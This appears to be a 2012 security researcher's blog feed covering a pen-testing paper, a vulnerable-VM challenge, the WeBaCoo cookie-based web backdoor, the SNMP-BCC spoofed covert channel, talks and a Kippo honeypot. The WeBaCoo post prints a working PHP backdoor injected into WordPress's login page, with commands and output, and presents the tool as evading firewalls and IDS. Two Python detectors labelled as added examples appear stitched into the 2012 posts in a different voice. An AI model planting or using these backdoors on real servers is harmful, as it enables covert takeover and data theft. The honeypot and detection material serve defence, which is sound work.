Anestis Bechtsoudis » Work Stuff (http://bechtsoudis.com). Driven by Passion for Challenges.

Aiming at Higher Network Security Through Extensive Penetration Tests
http://bechtsoudis.com/2012/06/11/aiming-at-higher-network-security-through-extensive-penetration-tests/
Mon, 11 Jun 2012 09:46:00 +0000

pp. 1752-1756, IEEE LATIN AMERICA TRANSACTIONS, VOLUME: 10, ISSUE: 3, APRIL 20

Abstract: Modern enterprise infrastructures adopt multilayer network architectures and heterogeneous server environments in order to efficiently fulfill each organization’s goals and objectives. These complex network architectures have resulted in increased demands for information security measures. Each organization needs to deal effectively with these major security concerns, forming a security policy according to its requirements and objectives. An efficient security policy must be proactive in order to provide sufficient defense layers against a variety of known and unknown attack classes and cases. This proactive approach is often wrongly interpreted as nothing more than keeping software and hardware up to date. Regular updates are necessary but not sufficient, because potential misconfigurations and design flaws cannot be located and patched by updates alone, leaving the whole network vulnerable to attackers. In this paper we present how a comprehensive security level can be reached through extensive Penetration Tests (Ethical Hacking). We present a Penetration Test methodology and framework capable of exposing possible exploitable vulnerabilities in every network layer. Additionally, we conducted an extensive analysis of a network penetration test case study against a network simulation lab setup, exposing common network misconfigurations and their security implications for the whole network and its users.

Index Terms:
penetration testing, network security, ethical hacking, proactive security policy

 

Authors:
Anestis Bechtsoudis
Computer Engineering and Informatics Department (CEID)
University of Patras, GREECE
e-mail: abechtsoudis [ at ] ieee.org

Nicolas Sklavos
Informatics & MM Dept., Branch of Pyrgos
Technological Educational Institute of Patras
Pyrgos, ZIP 27100, GREECE
e-mail: nsklavos [ at ] ieee.org

 

Download Full Paper

Download Full Paper (local mirror)

Copyright Notice

 

 

A. Bechtsoudis

Drunk Admin Web Hacking Challenge
http://bechtsoudis.com/2012/04/02/drunk-admin-web-hacking-challenge/
Mon, 02 Apr 2012 15:20:33 +0000

Recently I conducted a few keynote talks on the WeBaCoo tool and some web backdoor shell implementation techniques. As a great supporter of practical learning, I designed a related web hacking challenge that was given to the event attendees at the end of the talk. The challenge focuses on the techniques and methodologies discussed during the talks and implements a slightly restricted web server setup serving a vulnerable image hosting service.

 

Download

The challenge was served on a Debian vmware image which is available for download on the following link:

Download Challenge (539MB) – md5sum:edf9bcd28049ed85312510d5872ea463
Download mirror from boot2root

 

Configuration

The network is configured to obtain an IP address via DHCP by default. If you want to further configure the virtual machine, you can log in as user root with password toor. The Apache web server is configured to run on port 8880.

 

Mission

The challenge includes an image hosting web service that has various design vulnerabilities. You must enumerate the various web service features and find an exploitable vulnerability in order to read hidden system files. The web application is 100% custom, so do not try to search Google for related PoC exploit code.

FINAL GOAL: Reveal the hidden message for a date arrangement that Bob sent to Alice.

 

Work Flow

  1. Enumerate the web application carefully
  2. If you get stuck, repeat step 1
  3. Try to spawn a web shell or find a way to execute server-side code
  4. Read the hidden message

 

Appendix

Congratulations to Kyriakos Ispoglou (CEID student), who was the first to solve 100% of the challenge.

Available solution work flows (thanks for sending them):

Extra credits to mr.pr0n for providing a run2shell script that exploits the custom web application to spawn a remote shell on the vulnerable box.

 

If you find a different solving approach (with or without using WeBaCoo), or have just solved the challenge and want to disclose your solution, contact me.

 

 

A. Bechtsoudis

WeBaCoo Tool: Keeping your web shell under the mainstream radars
http://bechtsoudis.com/2012/03/21/webacoo-tool-keeping-your-web-shell-under-the-mainstream-radars/
Wed, 21 Mar 2012 19:09:29 +0000

Over the past two weeks I gave two presentations on the WeBaCoo tool: the first at the 3rd Unauthorized security meeting (11 March 2012) and the second at the Patras Linux User Group meetup (20 March 2012).

The presentations did not focus solely on the WeBaCoo tool and its features. Critical topics around web shell implementation and communication techniques were discussed, focusing on how to maintain stealthy behavior. Both events were followed by a custom web hacking challenge, for fun and learning.

I had a great time at both events and I would like to thank the organizing committees behind the scenes and the people who attended the presentations. It’s pleasant to see that people have started to get concerned about security issues and actively participate in relevant events.

 

Presentations can be downloaded from the following links:

Unauthorized (.pdf 1.1MB)

PLUG (.pdf 1.1MB)

 

 

A. Bechtsoudis

Expanding WeBaCoo
http://bechtsoudis.com/2012/01/30/expanding-webacoo/
Sun, 29 Jan 2012 22:41:50 +0000

Two months after the initial release, the WeBaCoo core communication functions are stable enough to provide a strong base for building some expansion modules. These modules are nothing more than regular actions that pentesters and sysadmins execute while interacting with the system, including database interactions, data file manipulation and more. The concept behind extension module development is to provide stealthy, stable and highly customizable functionality within the main terminal mode to assist users. All modules operate through the main WeBaCoo communication function and customize some settings on the target system if that is necessary for the module’s operation.

The extension modules were designed with both simplicity and stealthy behavior in mind. An extension module that offers large-scale functionality but is capable of exposing WeBaCoo by triggering IDS/IPS or application firewalls is not an option. A high level of customization is an additional goal at the top of the module design hierarchy. The basic module parameters can be given by the user during the module load process within the interaction terminal, while experienced users who need to customize some extra parameters can dig into the module’s source code and edit the desired variables as needed. Besides, pentesters have a good reputation for custom tweaking when messing around with open source tools.

For detailed documentation about available extension modules, you can refer to the modules project wiki page.

During the rest of the post three extension modules will be analyzed: mysql-cli, psql-cli and upload.

 

MySQL-CLI

MySQL-CLI was the first module to be developed. It uses the mysql command line utility on the target server to execute MySQL commands against the database service (local or remote). When the user loads the mysql-cli module, the login credentials are stored in internal variables. In the mysql-cli interaction console, every user-supplied command is packed as a one-liner and executed on the target server, returning the relevant output from the database.

 

PSQL-CLI

PSQL-CLI is a module for interacting with PostgreSQL databases. It uses the target system’s psql command line tool to communicate with the database. The challenge while designing this module was to overcome the interactive authentication process that the psql tool uses to log in. Unlike the mysql tool, psql doesn’t offer a password parameter to bypass the interactive password prompt. To overcome this, a .pgpass file is created in the user’s home directory with the login credentials.

 

Upload

After messing around with the available choices and after many tests, the final decision for the upload module was to use the HTTP POST method to upload files to the target host. A tiny PHP upload script is temporarily placed on the target to serve the upload and is then deleted. Every local file is uploaded as txt/plaintext to avoid any server-side limitations or triggering any protection mechanism. Random string names are generated to enhance the stealthy behavior. When using the upload module it is strongly advised to encrypt or obfuscate the files before upload, to prevent any rule-based detection of dangerous system/function names.

 

If you have any further ideas for additional modules contact me.

 

 

A. Bechtsoudis

SNMP-BCC — Relay-ing on SNMP for backdoor channel
http://bechtsoudis.com/2012/01/15/snmp-bcc-relay-ing-on-snmp-for-backdoor-channel/
Sun, 15 Jan 2012 00:19:11 +0000

Lately I have been working on an SNMP reflection toolkit to study the effects and impact ratio of SNMP reflection DoS attacks. During the development phase I spotted some interesting features of the SNMP request-reply working model. More specifically, I noticed that if you send an invalid SNMP OID in a GetRequest message, the agent replies with a Response message including an error code and the same invalid OID, as specified in the relevant RFCs. SNMP-BCC (Backdoor Communication Channel) takes advantage of the above SNMP feature, combined with IP source spoofing techniques, in order to create a stealthy communication channel using the SNMP agent as a relay.

SNMP (Simple Network Management Protocol) is a UDP-based protocol used mainly for monitoring purposes. Its connectionless UDP nature leaves SNMP exposed to IP source spoofing attacks, although this does not seem to concern network and system administrators, as my pen-test cases reveal. The reason admins usually (although wrongly) do not bother to secure their agents is the read-only behavior. While SNMP offers both read (get info) and write (set configuration variables) operations, under most infrastructures only the read behavior is implemented, serving monitoring purposes. This creates the belief among admins that there are no underlying security risks, shifting the problem to anti-spoofing mechanisms.

While messing around with SNMP functionality, the idea of developing SNMP-BCC was born as a PoC against the above wrong approach to SNMP setups. SNMP-BCC is capable of creating a stealthy backdoor communication channel with an “owned” host using an SNMP agent as a relay. Initially the data to be sent are packed following the ASN.1 OID format in an SNMP GetRequest packet. Then the source IP address of the UDP packet is altered to the end client’s IP address. This source-spoofed packet is transmitted to the public SNMP agent (the community string must be known). Of course the SNMP agent cannot locate this invalid OID and replies with an error response for the given OID. This error response, containing the untouched initial packed data, is finally delivered to the end host. Then the client, with the relevant decoder, can parse the data.

SNMP-BCC is mainly a post-exploitation tool that a pen-tester can use to establish a stealthy and hard to detect communication channel with a compromised host. Besides the backdoor communication purpose, someone can use the tool for data leakage and node pivoting purposes. While writing this post, the whole project is in its early stage and I haven’t yet decided whether it is worth continuing and, if so, with which working model. Although, I developed and made SNMP-BCC public in order to get feedback from my colleagues and the infosec community on the next steps.

SNMP-BCC is written in Perl using the raw-sockets library and is available at GitHub under the GPLv3 license. Using ‘snmpbcc.pl’, users can create spoofed SNMP packets carrying system commands under a user-interactive pseudo-shell mode. For testing purposes the project also includes the ‘backdoor.pl’ file that serves as a listener on the end host client. I haven’t implemented a full ASN.1 decoder in the backdoor code; that’s why the command is wrapped with some special characters (‘#$#’) in order to be easily extracted from the response message.
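To show what the relay leaves behind on the wire, here is an added example (my own code, not part of SNMP-BCC) in Python: a minimal SNMPv1 BER decoder that parses a hand-constructed noSuchName GetResponse and flags the echoed OID when its arcs spell ‘#$#’-wrapped text, which is what a network sensor would look for to spot this channel. The packet bytes, the request-id 42 and the payload “id” are constructed for the example.

```python
# Added example, not part of SNMP-BCC: a minimal SNMPv1 decoder that flags
# GetResponse packets whose noSuchName error echoes an OID that is really text.
# SAMPLE_RESPONSE is a hand-built packet (constructed for this example):
# community "public", request-id 42, error-status 2 (noSuchName), error-index 1,
# one varbind with OID 1.3.6.1.4.1.35.36.35.105.100.35.36.35, whose arcs after
# the enterprise prefix spell "#$#id#$#" in ASCII.
SAMPLE_RESPONSE = bytes.fromhex(
    "302b"                            # SEQUENCE, 43 bytes of content
    "020100"                          # INTEGER version 0 (SNMPv1)
    "04067075626c6963"                # OCTET STRING "public"
    "a21e"                            # [2] GetResponse-PDU, 30 bytes
    "02012a" "020102" "020101"        # request-id 42, error-status 2, error-index 1
    "3013" "3011"                     # VarBindList, VarBind
    "060d2b060104012324236964232423"  # OBJECT IDENTIFIER (13 bytes)
    "0500"                            # NULL value
)

GET_RESPONSE_TAG = 0xA2
NO_SUCH_NAME = 2
MARKER = "#$#"  # wrapper the post's backdoor.pl listener searches for


def read_tlv(buf, pos):
    """Decode one BER TLV at buf[pos]; returns (tag, value, next_pos). Handles long-form lengths."""
    tag, length, pos = buf[pos], buf[pos + 1], pos + 2
    if length & 0x80:
        n = length & 0x7F
        length = int.from_bytes(buf[pos:pos + n], "big")
        pos += n
    return tag, buf[pos:pos + length], pos + length


def read_children(body):
    """Split the body of a constructed type into [(tag, value), ...]."""
    items, pos = [], 0
    while pos < len(body):
        tag, value, pos = read_tlv(body, pos)
        items.append((tag, value))
    return items


def decode_oid(body):
    """Expand BER OID bytes into integer arcs (first byte packs two arcs, rest are base-128)."""
    arcs, cur = [body[0] // 40, body[0] % 40], 0
    for b in body[1:]:
        cur = (cur << 7) | (b & 0x7F)
        if not b & 0x80:
            arcs.append(cur)
            cur = 0
    return arcs


def parse_snmp_v1(packet):
    """Return the fields of an SNMPv1 message; raises ValueError if the outer shape is wrong."""
    def _int(b):
        return int.from_bytes(b, "big", signed=True)
    tag, body, _ = read_tlv(packet, 0)
    if tag != 0x30:
        raise ValueError("not an SNMP message")
    (_, ver), (_, community), (pdu_tag, pdu) = read_children(body)
    (_, rid), (_, status), (_, index), (_, varbinds) = read_children(pdu)
    oids = [decode_oid(read_children(vb)[0][1]) for _, vb in read_children(varbinds)]
    return {"version": _int(ver), "community": community.decode("latin-1"),
            "pdu_tag": pdu_tag, "request_id": _int(rid), "error_status": _int(status),
            "error_index": _int(index), "oids": oids}


def inspect_response(packet):
    """Flag a noSuchName GetResponse whose echoed OID carries marker-wrapped text."""
    msg = parse_snmp_v1(packet)
    finding = {"relay_suspected": False, "payloads": []}
    if msg["pdu_tag"] != GET_RESPONSE_TAG or msg["error_status"] != NO_SUCH_NAME:
        return finding
    for arcs in msg["oids"]:
        # Map each arc after the root pair onto ASCII; genuine MIB arcs rarely form
        # readable text, and the wrapper marker is the tell-tale of relayed data.
        text = "".join(chr(a) if 32 <= a < 127 else "." for a in arcs[2:])
        parts = text.split(MARKER)
        if len(parts) >= 3:
            finding["payloads"].append(parts[1])
    finding["relay_suspected"] = bool(finding["payloads"])
    return finding


if __name__ == "__main__":
    print(parse_snmp_v1(SAMPLE_RESPONSE))
    print(inspect_response(SAMPLE_RESPONSE))
```

The same decoder run over a capture of the agent's outbound UDP/161 traffic would also reveal the spoofed-source side of the scheme: error responses leaving for hosts that never legitimately poll the agent.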

You can get the latest version of the tool by cloning the repository

git clone git://github.com/anestisb/SNMP-BCC.git

Or by directly downloading the zip project archive

https://github.com/anestisb/SNMP-BCC/zipball/master

Here is a screenshot with SNMP-BCC in action:

 

Your comments are greatly appreciated for the tool’s evolution.

 

 

A. Bechtsoudis

ICT Security Basics – Demystifying the Sec puzzle
http://bechtsoudis.com/2011/11/30/ict-security-basics-demystifying-the-sec-puzzle/
Wed, 30 Nov 2011 20:24:32 +0000

On 24 November 2011, I was invited to give an introductory presentation about Information and Network Security at the 4th Student Guru Patras branch meetup. Thanks to Erikos Alkalai for the invitation and congratulations to the whole branch support team for their great work.

Knowing that the audience consisted mainly of undergraduate students in their first years at university, with no prior contact with information and computer security issues, the presentation focused on the basic theory and some practical issues that a computer engineer must know. The theoretical part was followed by a half-hour live hacking demo, presenting trivial ways an attacker can follow to compromise a main server system.

 

The presentation can be downloaded from here:

Presentation (.pdf 480KB)

 

 

 

A. Bechtsoudis

WeBaCoo (Web Backdoor Cookie) Script-Kit – The Birth
http://bechtsoudis.com/2011/11/29/webacoo-web-backdoor-cookie-script-kit-the-birth/
Tue, 29 Nov 2011 14:48:47 +0000

Recently I was messing around with some PHP backdoors capable of providing a “pseudo”-terminal connection to a remote web server injected with a chunk of malicious PHP code. All the existing scripts and tools (such as weevely, hookworm) send the shell commands hidden in HTTP header fields, while the server’s output is printed out as part of the HTML code. Inspired by the above implementations, I thought: why not send the server’s command output using the HTTP response headers? And under these dark thoughts the WeBaCoo (Web Backdoor Cookie) script-kit was born.

The general concept is pretty simple. Initially the backdoor PHP code is generated using payloads containing the main PHP system functions, operating under a basic Cookie handling mechanism. After the code injection, the client can send shell commands hidden in Cookie headers, obfuscated with base64 encoding. On the server side the shell command is executed and the output is transmitted back to the client hidden (base64 encoded too) in Cookie headers.

WeBaCoo is written in Perl and is available at GitHub. Clone the repository:

git clone git://github.com/anestisb/WeBaCoo.git

Or download the latest version from:

http://bechtsoudis.com/data/tools/webacoo-latest.tar.gz

 

Let’s look at two case studies in order to present WeBaCoo‘s functionality. I will use a local Burp proxy (127.0.0.1:8080) to inspect the HTTP header cookies.

1. Simple case

The first scenario involves adding a new PHP file with the obfuscated backdoor code in the webroot path. After the addition, the client can use the terminal mode to execute commands on the server.

Initially let’s create the backdoor file using the ‘shell_exec’ system function:

root@testbed:~# ./webacoo.pl -g -f 2 -o backdoor.php

WeBaCoo 0.1 - Web Backdoor Cookie Script-Kit
Written by Anestis Bechtsoudis { @anestisb | anestis@bechtsoudis.com }
http(s)://bechtsoudis.com

[+] Backdoor file "backdoor.php" created.

Then I upload backdoor.php to the victim server and start a “terminal” connection:

root@testbed:~# ./webacoo.pl -t -u http://172.16.146.128/backdoor.php

WeBaCoo 0.1 - Web Backdoor Cookie Script-Kit
Written by Anestis Bechtsoudis { @anestisb | anestis@bechtsoudis.com }
http(s)://bechtsoudis.com

Type 'exit' to quit terminal!

webacoo> whoami
www-data
webacoo> exit

^Bye^

The corresponding request and response recorded by Burp are seen in the following screenshots:


2. Complex case – backdooring wordpress login

Users familiar with WordPress know that before the login process, the server sets a test cookie to check whether the browser has cookies enabled. After that test cookie is set I will inject the backdoor code unobfuscated. I create the PHP payload using the ‘passthru’ function and the -r (raw output) flag to get the un-obfuscated code.

root@testbed:~# ./webacoo.pl -g -f 4 -o raw-backdoor.php -r

WeBaCoo 0.1 - Web Backdoor Cookie Script-Kit
Written by Anestis Bechtsoudis { @anestisb | anestis@bechtsoudis.com }
http(s)://bechtsoudis.com

[+] Backdoor file "raw-backdoor.php" created.

Then the malicious code is injected right after the test cookie is set. So wp-login.php looks as follows (only the crucial lines are included):

//Set a cookie now to see if they are supported by the browser.
setcookie(TEST_COOKIE, 'WP Cookie check', 0, COOKIEPATH, COOKIE_DOMAIN);
if ( SITECOOKIEPATH != COOKIEPATH )
        setcookie(TEST_COOKIE, 'WP Cookie check', 0, SITECOOKIEPATH, COOKIE_DOMAIN);
 
//My payload
if(isset($_COOKIE['cm'])){ob_start();passthru(base64_decode($_COOKIE['cm']).' 2>&1');setcookie($_COOKIE['cn'],$_COOKIE['cp'].base64_encode(ob_get_contents()).$_COOKIE['cp'], 0, SITECOOKIEPATH, COOKIE_DOMAIN);ob_end_clean();}
 
// allow plugins to override the default actions, and to add extra actions if they want
do_action( 'login_init' );
do_action( 'login_form_' . $action );

After the injection I establish a “terminal” connection to the infected server to execute my commands:

root@testbed:~# ./webacoo.pl -t -u http://172.16.146.128/wordpress/wp-login.php -p 127.0.0.1:8080

WeBaCoo 0.1 - Web Backdoor Cookie Script-Kit
Written by Anestis Bechtsoudis { @anestisb | anestis@bechtsoudis.com }
http(s)://bechtsoudis.com

Type 'exit' to quit terminal!

webacoo> whoami
www-data
webacoo> exit

^Bye^

And the corresponding request and response recorded by Burp:


As you can see, the communication data are pretty stealthy and will not trigger regular application firewalls and IDS/IPS setups. I would appreciate your feedback from various tests under your setups to evaluate and evolve WeBaCoo’s functionality.
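To give defenders something concrete, the following is an added example (not code from the WeBaCoo project) in Python that inspects a request Cookie header and the matching Set-Cookie response for the pattern described in this post: a cookie whose value base64-decodes to text, and a reply cookie whose name and delimiter were dictated by the client. The cookie names cm/cn/cp come from the PHP payload above; the sample headers and their values are constructed.

```python
import base64
import binascii
import re
import string

# Constructed sample exchange (not a capture from the post) modelled on the cookie
# channel described above: "cm" carries the base64 command, "cn" names the cookie
# the backdoor will answer in, "cp" is the delimiter that wraps the base64 output.
SAMPLE_REQUEST_COOKIE = "PHPSESSID=3f2a1c; cm=d2hvYW1p; cn=M-cookie; cp=eVIQ"
SAMPLE_RESPONSE_SET_COOKIE = "M-cookie=eVIQd3d3LWRhdGEKeVIQ; path=/"

PRINTABLE = set(string.printable)


def parse_cookie_header(header):
    """Split a Cookie or Set-Cookie header into a dict of name -> value."""
    pairs = {}
    for part in header.split(";"):
        if "=" in part:
            name, value = part.strip().split("=", 1)
            pairs[name.strip()] = value.strip()
    return pairs


def decode_if_base64_text(value):
    """Return the decoded text if value is well-formed base64 of printable ASCII, else None."""
    if len(value) % 4 or not re.fullmatch(r"[A-Za-z0-9+/]+={0,2}", value):
        return None
    try:
        text = base64.b64decode(value, validate=True).decode("ascii")
    except (binascii.Error, UnicodeDecodeError):
        return None
    return text if text and all(c in PRINTABLE for c in text) else None


def inspect_exchange(request_cookie, response_set_cookie):
    """Score one request/response pair for the cookie-tunnel pattern.

    Signal 1 (weak): a request cookie whose value base64-decodes to plain text.
    Signal 2 (strong): the response sets a cookie whose name was supplied as a
    request cookie value, and whose value is wrapped by another request cookie
    value acting as a delimiter around a base64 body. Ordinary applications pick
    their own Set-Cookie names; they do not let the client dictate them.
    """
    req = parse_cookie_header(request_cookie)
    resp = parse_cookie_header(response_set_cookie)
    finding = {"suspicious": False, "commands": [], "outputs": [], "reasons": []}

    for name, value in req.items():
        decoded = decode_if_base64_text(value)
        if decoded:
            finding["commands"].append(decoded)
            finding["reasons"].append(f"request cookie {name} decodes to text")

    for reply_name in req.values():
        if reply_name not in resp:
            continue
        wrapped = resp[reply_name]
        for delim in req.values():
            if not delim or len(wrapped) <= 2 * len(delim):
                continue
            if wrapped.startswith(delim) and wrapped.endswith(delim):
                output = decode_if_base64_text(wrapped[len(delim):-len(delim)])
                if output:
                    finding["outputs"].append(output)
                    finding["reasons"].append(
                        f"response cookie {reply_name} is client-named and delimiter-wrapped base64")

    finding["suspicious"] = bool(finding["reasons"])
    return finding


if __name__ == "__main__":
    print(inspect_exchange(SAMPLE_REQUEST_COOKIE, SAMPLE_RESPONSE_SET_COOKIE))
```

Signal 1 alone will false-positive on legitimate base64 cookies, so a rule built from this should alert on signal 2 and only use signal 1 to enrich the event.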

 

 

A. Bechtsoudis

Network Penetration Testing
http://bechtsoudis.com/2011/11/26/network-penetration-testing/
Fri, 25 Nov 2011 23:21:01 +0000

Keynote speaker at Athena Summer School 2011, with a talk entitled “Aiming at Higher Network Security Levels through extensive Penetration Testing“. An introductory address highlighting modern security complexity while focusing on real proactive security policies through penetration tests. The presentation was followed by a live demo hacking Cisco devices in a virtual lab.

 

The presentation can be downloaded from here:

Presentation (.pdf 1.0MB)

A. Bechtsoudis

Introduction to Side Channel Attacks
http://bechtsoudis.com/2011/03/31/introduction-to-side-channel-attacks/
Thu, 31 Mar 2011 13:12:38 +0000

On 30 March 2011, I gave an introductory presentation on Side Channel Attacks to the PLUG community. Most PLUG members are software designers and are not familiar with the science of cryptography. Through my presentation I tried to inform them about the side channel leakage that occurs when cryptographic primitives are implemented in physical devices (smart cards, dedicated hardware etc.). After a short introduction to cryptography and cryptanalysis, I presented the classes of Side Channel Attacks and some basic attack scenarios. The most important point that I tried to highlight is that in order to protect against these kinds of attacks, software, hardware and protocol designers must work together in order to achieve the best possible results. That’s why it is important for a software designer to have basic knowledge of this kind of cryptanalytic attack.

 

The presentation includes:

  1. Introduction to the IT state of the art and cryptography
  2. Cryptanalysis goals and approaches
  3. Side Channel Attack scenarios
  4. Software and hardware countermeasures
  5. Conclusions and highlights

 

The presentation can be downloaded from here:

Presentation (.pdf 643KB)

 

 

A. Bechtsoudis

Kippo – SSH Honeypot
http://bechtsoudis.com/2011/03/27/kippo-ssh-honeypot/
Sun, 27 Mar 2011 14:25:04 +0000

As part of the network administration in the Network Operation Center (NOC) of the Computer Center Laboratory, we must secure the server and network infrastructure from internal or external malicious activity. Crucial base servers and network nodes have been independently secured against the majority of attacks. But the challenge is to be able to secure the non-crucial hosts, such as users’ machines that have access to servers and network devices at lower levels of the infrastructure. The obstacle to the whole concept is that we are on a university network, which includes people with different levels of computer and IT knowledge, plus the large number of services and experimental technologies that are in use. So we must implement security countermeasures that are invisible to the end users or simple enough to be adopted by any user of the university infrastructure.

One of the security forensics approaches is: “Allow attacks in a sandbox environment, analyze them and learn from them!“ Following this approach, we came across honeypot mechanisms. Honeypots are mechanisms deployed in networks that are designed to lure malicious activity in order to analyze it. They have low and easy-to-bypass security and access controls, forming a great trap for botnets and inexperienced hackers. The experience level an attacker must have in order to get trapped in a honeypot host or network depends on the honeypot’s interaction level and its implemented services. That’s why honeypots are classified into low and high interaction, with low interaction offering emulated services (limited interaction) and high interaction offering full functionality.

We chose a solution somewhere in the middle of the interaction scale. We were looking for something easy to set up, given our demands, and whose collected data are easy to analyze. So we chose Kippo, which is a medium interaction SSH honeypot. Kippo logs SSH brute-force attacks and offers shell interaction to analyze the commands executed by the attacker. Its features include a fake Debian 5 based shell, a fake filesystem that can be easily altered by the user, saving of files downloaded with wget for analysis, and UML compatible log files.

One part of our goal has been achieved by analyzing the malicious files that attackers downloaded from infected web servers. We will continue running Kippo for a short period, because we have discovered that moderators of large botnets retain a blacklist where they record the IPs of hosts that aren’t real machines (such as honeypots). We were greatly surprised to realize that all the attacks we have recorded so far were executed by a human and not by any botnet script. And the goal of all the attackers was to turn the machine into a scanning zombie that launches brute-forcing attacks over the network. Additionally, most of the attackers tried to run an IRC server in order to mass control their infected hosts. We have recorded their IRC channels and the code they used, and we will keep an eye on their tactics.

In the near future we plan to set up a higher interaction level honeypot and honeynet, in order to analyze more advanced attack techniques.

 

Here are some tty sessions of attack attempts that we have recorded from our honeypot, plus a Python script that can be used to replay the shell interaction from the attack:

Download Logs + PlayScript

 

Additionally, with my colleague John Kalantzis from the UNIX Administration Team, I gave a presentation at PLUG about SSH security and the use of the Kippo honeypot. The slides from the presentation can be downloaded from here:

Presentation (.pdf 84 kb)

 

The Kippo honeypot project ran in collaboration with John Kalantzis.

 

 

A. Bechtsoudis
